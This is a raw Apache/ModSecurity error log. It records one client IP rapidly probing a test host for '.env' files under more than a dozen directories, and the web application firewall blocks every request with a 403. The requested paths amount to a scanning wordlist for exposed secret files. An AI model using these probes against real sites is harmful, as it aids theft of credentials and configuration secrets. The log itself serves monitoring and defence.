[Sun Sep 14 15:35:48.947739 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0DgAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.947971 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0DgAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:48.948140 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aMbEtGXJXtYjt2K02q_0DgAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.003437 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /uploads/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0DwAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.003665 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0DwAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.003812 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0DwAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.058356 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0EAAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.058587 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0EAAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.058733 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0EAAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.113834 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0EQAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.114066 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0EQAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.114218 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0EQAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.168513 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0EgAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.168745 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0EgAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.168914 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0EgAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.226521 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0EwAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.226760 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0EwAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.226912 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0EwAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.281863 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0FAAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.282090 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0FAAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.282241 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0FAAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.336876 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0FQAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.337110 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0FQAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.337262 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0FQAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.395005 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0FgAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.395247 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0FgAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.395424 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0FgAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.450146 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0FwAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.450413 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0FwAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.450570 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0FwAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.505304 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0GAAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.505523 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0GAAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.505668 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0GAAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.563455 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0GQAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.563710 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0GQAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.563874 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0GQAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.619192 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0GgAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.619430 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0GgAAAA4"], referer: https://www.google.com/
[Sun Sep 14 15:35:49.619596 2025] [:error] [pid 2720118] [client 15.237.113.106:60182] [client 15.237.113.106] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "aMbEtWXJXtYjt2K02q_0GgAAAA4"], referer: https://www.google.com/
